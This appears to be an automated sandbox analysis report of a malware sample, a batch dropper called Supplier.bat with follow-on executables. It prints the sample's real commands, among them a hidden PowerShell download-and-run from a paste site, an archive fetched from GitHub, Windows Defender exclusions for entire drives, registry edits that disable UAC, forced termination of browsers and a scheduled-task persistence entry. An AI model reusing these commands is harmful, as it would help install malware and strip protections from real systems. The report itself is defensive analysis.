Code function: 46_2_006AE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

46_2_006AE47B

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Synaptics\Synaptics.exe	Thread delayed: delay time: 60000
Source: C:\ProgramData\Synaptics\Synaptics.exe	Thread delayed: delay time: 60000

Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft

Source: Amcache.hve.68.dr	Binary or memory string: VMware
Source: Amcache.hve.68.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.68.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.68.dr	Binary or memory string: VMware, Inc.
Source: XVZBZS.exe, 00000041.00000003.1826367695.00000000018A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.68.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.68.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.68.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.68.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: svchost.exe, 00000013.00000002.2549134142.000001C979454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2543464512.000001C973C2B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2024268734.00000000007DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000032.00000002.2024268734.0000000000830000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: DOCX.exe, 0000002A.00000002.1707030113.000000000083F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.68.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.68.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.68.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.68.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ._cache_DOCX.exe, 0000002E.00000002.2548630061.00000000043E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: XVZBZS.exe, 00000041.00000003.1826367695.00000000018A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}M
Source: Amcache.hve.68.dr	Binary or memory string: vmci.sys
Source: DOCX.exe, 0000002A.00000002.1707030113.000000000083F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.68.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.68.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.68.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.68.dr	Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.68.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.68.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.68.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.68.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.68.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.68.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.68.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.68.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: powershell.exe, 00000009.00000002.1337187359.000001FB1B990000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWeP
Source: Amcache.hve.68.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.68.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.68.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.68.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\._cache_DOCX.exe	API call chain: ExitProcess graph end node	graph_46-90400
Source: C:\Users\user\Desktop\._cache_DOCX.exe	API call chain: ExitProcess graph end node	graph_46-91674
Source: C:\Users\user\Desktop\._cache_DOCX.exe	API call chain: ExitProcess graph end node	graph_46-90066
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006E703C BlockInput,

46_2_006E703C

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_0069374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,

46_2_0069374E

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006C46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

46_2_006C46D0

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_007F80C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

46_2_007F80C0

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006BA937 GetProcessHeap,

46_2_006BA937

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006B8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,	46_2_006B8E3C
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006B8E19 SetUnhandledExceptionFilter,	46_2_006B8E19
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00428E19 SetUnhandledExceptionFilter,	60_2_00428E19
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00428E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,	60_2_00428E3C

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Supplier.bat, type: SAMPLE
Source: Yara match	File source: amsi64_7320.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_6112.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7320, type: MEMORYSTR

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"

Excessive usage of taskkill to terminate processes

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iexplore.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM safari.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epic.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM tor.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM CMD.exe	Jump to behavior

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006CBE95 LogonUserW,

46_2_006CBE95

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_0069374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,

46_2_0069374E

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006D4B52 SendInput,keybd_event,

46_2_006D4B52

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006D7DD5 mouse_event,

46_2_006D7DD5

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\Supplier.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\Supplier.bat'))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 15	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOCX.zip" -o"C:\Users\user\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 15	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe "C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iexplore.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM safari.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epic.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM tor.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM CMD.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Process created: C:\Users\user\Desktop\._cache_DOCX.exe "C:\Users\user\Desktop\._cache_DOCX.exe"
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn TGWEKK.exe /tr C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 1

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iexplore.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM safari.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epic.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM tor.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM CMD.exe	Jump to behavior

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006CB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

46_2_006CB398

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006CBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

46_2_006CBE31

Source: ._cache_DOCX.exe, XVZBZS.exe	Binary or memory string: Shell_TrayWnd
Source: ._cache_DOCX.exe, 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmp, XVZBZS.exe, 0000003C.00000002.1815716948.00000000004AE000.00000040.00000001.01000000.0000000F.sdmp, XVZBZS.exe, 00000041.00000002.1842372870.00000000004AE000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006B7254 cpuid

46_2_006B7254

Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
